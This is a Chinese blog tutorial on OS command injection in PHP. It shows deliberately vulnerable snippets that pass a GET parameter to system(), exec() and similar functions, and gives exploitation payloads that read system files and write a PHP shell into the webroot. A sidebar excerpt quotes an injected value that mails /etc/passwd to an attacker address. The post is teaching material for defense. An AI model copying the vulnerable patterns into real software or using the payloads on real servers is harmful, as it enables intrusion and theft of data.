Web安全--OS命令注入

最新推荐文章于 2022-08-20 20:50:45 发布
最新推荐文章于 2022-08-20 20:50:45 发布
阅读量548 收藏 5
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_37786014/article/details/104718563
版权

1. 原理和成因
程序员使用脚本语言开发过程中,脚本语言开发十分快速、简洁,但是也伴随着一些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一些外部程序,当应用需要调用一些外部程序时就会用到一些系统命令的函数。
应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户的输入的情况下,就会造成命令执行漏洞。

2. 造成漏洞的原因
(1)用户输入作为拼接
(2)没有足够的过滤

3. 漏洞危害
(1)继承web服务器程序权限,去执行系统命令
(2)继承web服务器权限,读写文件
(3)反弹shell
(4)控制整个网站
(5)控制整个服务器

4. 相关函数
(1)system()
system()能够将字符串作为os命令执行,自带输出功能,测试代码如下:

<?php
if(isset($_GET['cmd'])){
	$str=$_GET['cmd'];
	system($str);
}else{
	echo "test error"
}
?>

(2) exec()
exec()函数能将字符串作为OS命令执行,需要输出执行结果,例子如下:

<?php
if(isset($_GET['cmd'])){
	$str=$_GET['cmd'];
	print exec($str)
}
?>

exec()返回的结果是有限的,但是命令是能正常执行的

(3)shell_exec()

<?php
if(isset($_GET['cmd'])){
	$str=$_GET['cmd'];
	print shell_exec($str)
}
?>

(4)passthru()

<?php
if(isset($_GET['cmd'])){
	passthru($_GET['cmd']);
}
?>

(5) 反引号 `
两个反引号内的字符串被被解析成os命令

<?php
if(isset($_GET['cmd'])){
	$str=$_GET['cmd'];
	print `$str`
}
?>

5. 漏洞利用
OS命令注入漏洞,攻击者直接集成Web用户权限,在服务器上执行任意命令,危害特别大。以下命令均在windows系统下测试成功。
(1)查询系统文件
提交参数 ?cmd=type c:\windows\system32\drivers\etc\hosts 查看系统host文件
(2)显示当前路径
提交参数cmd=cd
(3)写文件
提交参数 ?cmd=echo “<?php phpinfo();?>” > D:\xampp\htdocs\Commandi\shell.php
页面没有报错,说明文件写入成功,访问shell.php文件

6. 防御方法
(1)尽量减少命令执行函数的使用,并在disable_functions中禁用
(2)在进入命令执行的函数或方法之前,对参数进行过滤
(3)参数的值精良使用引号包裹,并在拼接前调用addslashes进行转义

催催催不翠
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python os.popen基础/os.popen 安全注入OS命令注入漏洞\subprocess.getstatusoutput OS命令注入漏洞)、python 过滤命令注入危险字符
西京刀客
04-29 7168
文章目录一、python OS命令注入漏洞1. 警惕subprocess.getstatusoutput OS命令注入漏洞2. os.popen OS命令注入漏洞os.popen基础python os.popen OS命令注入漏洞 一、python OS命令注入漏洞 1. 警惕subprocess.getstatusoutput OS命令注入漏洞 python直接执行代码漏洞_警惕OS命令注入漏洞 - python篇 参考URL: https://blog.csdn.net/weixin_3980585
Windows cmd(dos)小命令
127.0.0.1的博客
04-19 772
一、使用windows cmd(dos)实现电脑自动关机/重启 shutdown -s -t 0 /*该命令行的意思是0秒后关机。 这里的0和-s可以根据自己的情况改动。 -s可以改为-r意为重启。 0可以改为其他数字,意为多少秒后重启或关机。*/ shutdown -a /*这个条命令是取消上面的命令的。*/ 二、使用windows cmd(dos)进行网络质量简单检测 ping www.b...
LinuxOS注入过滤特殊字符,过滤网址和输入框中的特殊字符,止sql注入
weixin_39638086的博客
05-12 112
usingSystem;usingSystem.Data;usingSystem.Configuration;usingSystem.Web;usingSystem.Web.Security;usingSystem.Web.UI;usingSystem.Web.UI.HtmlControls;usingSystem.Web.UI.WebControls;usingSystem.W...
web-攻击后端组件】(7.1)注入操作系统命令:Perl、ASP、动态执行、OS命令注入
08-20 532
注入操作系统命令】Perl、ASP、动态执行、OS命令注入
system()命令注入
weixin_33754065的博客
11-23 2294
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 #include"stdlib.h" #include"stdio.h" voidmain() { chars[255]; while(1) { printf("inputcmd:...
命令注入讲解ppt.pptx
08-10
最常见的命令注入攻击形式是 SQL 命令注入攻击(简称 SQL 注入),是指恶意黑客利用设计上的安全漏洞,把 SQL 代码粘贴在网页形式的输入框内,进而改变服务端数据。 PHP 应用程序中也有名为 PHP 命令注入攻击的漏洞...
Python-BBQSQLSQL注入开发工具
08-10
在信息安全领域,SQL注入是一种常见的攻击手段,攻击者通过在Web应用程序的输入字段中插入恶意SQL代码,来获取、修改或删除数据库中的敏感信息。BBQSQL通过自动化和定制化的查询方式,使得这一过程更为高效。 **...
Commix-Automated-All-in-One-OS-command-injection-ang-exploitation-tool:Web开发人员,渗透测试人员甚至安全研究人员都可以使用自动化的多合一OS命令注入和利用工具,以测试基于Web的应用程序,以查找与命令注入攻击相关的错误,错误或漏洞。安装
03-21
自动化的多合一OS命令注入和利用工具 可以从Web开发人员,渗透测试人员甚至安全部门使用 研究人员以测试基于Web的应用程序 以查找错误,错误或漏洞 与命令注入攻击有关。 安装 : $ apt更新&& apt升级$ apt安装git $...
SQL注入天书 sqli-labs
01-11
7. **OS命令注入**:在某些情况下,SQL查询可以直接执行操作系统命令,这时要警惕命令注入的风险。 8. **御策略**:掌握参数化查询、输入验证、错误处理隐藏、少用动态SQL等方法,以止SQL注入。 9. **Web应用...
commix:自动化的多合一OS命令注入和利用工具
02-05
Commix ([ comm ]和[ i ] jection e [ x ] ploiter的缩写)是由 ( )编写的自动化工具,可以从Web开发人员,渗透测试人员甚至安全研究人员处使用,以测试Web-基于应用程序的视图,以查找与攻击相关的错误,错误或...
OS命令注入】常见OS命令执行函数以及OS命令注入利用实例以及靶场实验—基于DVWA靶场
m0_64378913的博客
06-26 2336
背景:程序员使用脚本语言(如PHP等)开发应用程序过程中,脚本语言开发十分快速、简洁、方便,但是也伴随着一些问题,比如速度慢、无法触及系统底层等。开发的应用时,特殊是企业级的一些应用需要去调用一些外部程序(系统命令或者exe等可执行文件),当应用需要调用一些外部程序时就会用到一些系统命令的函数。OS命令注入:当应用在调用这些系统命令函数时,如果将用户的输入作为系统命令的参数拼接到命令中,在没有过滤用户输入的情况下,就会造成命令执行漏洞。条件:漏洞危害:作用:该函数能够将字符串作为OS命令执行,自带输出功能。
php 系统命令注入漏洞,Web 安全漏洞之 OS 命令注入
weixin_30423205的博客
03-25 245
什么是 OS 命令注入上周我们分享了一篇在 Node.js 中可以使用 exec() 执行命令。以基于 tar 命令去解压文件,大致代码如下:const { exec } = require('child_process');const extractPath = path.join(think.RUNTIME_PATH, 'importMarkdownFileToFirekylin');modu...
注入进阶之OS命令注入
JBlock的博客
10-12 1万+
1.os命令注入介绍    OS指令执行是为了通过网络接口在web服务器执行OS命令的一种技术。如果应用程序使用外部输入的字符串或受外部影响的字符串组装命令,并且没有经过正确的过滤,就可能导致OS命令注入攻击。 2.类型 第一种类型是,应用程序执行一个自己控制的固定程序,通过用户输入的参数来执行命令。这时,可以通过参数的分隔符,在参数中注入命令,来执行攻击者想要运行的命令。 第二种类型是
os 命令注入
weixin_43706468的博客
03-13 2480
命令分隔符注入命令 Java代码也提供一些接口,如Runtime.getRuntime().exec(“command”),System.exec(“command”),调用这两个命令,可以执行一些体统命令。下面给一段代码: Public static void main(String command){ Runtime run = Runtime.getRuntime(); try{ Proce...
Web 安全漏洞之 OS 命令注入
weixin_33853827的博客
11-05 782
什么是 OS 命令注入 上周我们分享了一篇 《Web 安全漏洞之 SQL 注入》,其原理简单来说就是因为 SQL 是一种结构化字符串语言,攻击者利用可以随意构造语句的漏洞构造了开发者意料之外的语句。而今天要讲的 OS 命令注入其实原理和 SQL 注入是类似的,只是场景不一样而已。OS 注入攻击是指程序提供了直接执行 Shell 命令的函数的场景,当攻击者不合理使用,且开发者对用户参数未考虑安全因素...
操作系统命令注入OS command injection)学习笔记
汗的博客
05-06 5300
笔者burpsuite在线安全学院的OS command injection学习笔记。限于本人水平,笔记质量不是很高,假如有看到的大佬轻喷,很多地方是Google翻译的,还请多多包涵。 文章目录什么是OS命令注入?执行任意命令Lab: OS command injection, simple case有用的命令OS盲注使用时间延迟检测OS盲注Lab: Blind OS command inject...
Java命令注入
热门推荐
沧海一粟
07-16 1万+
1 Java中的命令注入 在Java中的Runtime.getRuntime本质就是使用ProcessBuilder,以ProcessBuilder里用ProcessImpl,start 的一个子进程执行命令, Java的native调用 a. Windows是CreateProcessW 创建子进程执行命令 b. Unix中以enecve 来创建子进程执行命令
Web技术攻击】OS(Operating System)命令注入攻击
AC_greener的博客
05-06 2622
OS命令注入攻击是指通过Web应用,执行非法的操作系统命令达到攻击的目的OS注入攻击案例:以表单的发送功能为例,该功能可将用户的邮件按已填写的对方邮箱地址放过去。 攻击者将下面的值指定作为邮件地址: ; cat /etc/passwd | mail hack@example.jp 程序接收该值,构成以下的命令组合: “| /usr/sbin/sendmail ; cat /etc/passwd |
系统命令注入的介绍与代码
煜铭2011
10-07 1万+
0x01 介绍        该软件使用受外部影响的输入来构造操作系统命令的全部或一部分,但未能对可能修改所需操作系统命令的元素进行无害化处理。这样一来,攻击者就可以直接在操作系统上执行意外的危险命令。在攻击者没有对操作系统的直接访问权的情况下(例如在 Web 应用程序中),此弱点可能导致脆弱性。反过来说,如果该弱点发生在特权程序中,攻击者有可能能够指定通常不可访问的命令,或者通
--os-shell后404怎么办
最新发布
06-11
如果你在使用SQLMap的`--os-shell`选项时遇到了404错误,可能是由于以下原因之一导致的: 1. 目标网站或应用程序可能已经修复了漏洞,或者你的SQL注入语句不再有效。在这种情况下,你需要重新评估目标并查找新的漏洞。 2. 目标服务器可能已经配置了WAF(Web应用程序火墙),阻止了你的命令执行。在这种情况下,你需要使用其他的绕过WAF的技巧,例如更改User-Agent,使用编码字符等。 3. 你的命令语法可能有误。请确保你正确地使用了`--os-shell`选项,并正确地指定了目标URL和其他必要的参数。 如果你遇到了404错误,可以尝试以下步骤来解决问题: 1. 确认你的SQL注入语句是否仍然有效。可以使用其他的SQL注入工具或手动测试来验证。 2. 确认是否存在WAF或其他安全护措施。可以使用其他的绕过技巧来试图绕过这些护措施。 3. 确认你是否正确地使用`--os-shell`选项,并正确地指定了目标URL和其他必要的参数。可以参考SQLMap的官方文档来了解正确的命令语法。 如果你仍然无法解决问题,你可以考虑使用其他的命令执行工具或方法,例如反弹Shell或使用其他的漏洞利用工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值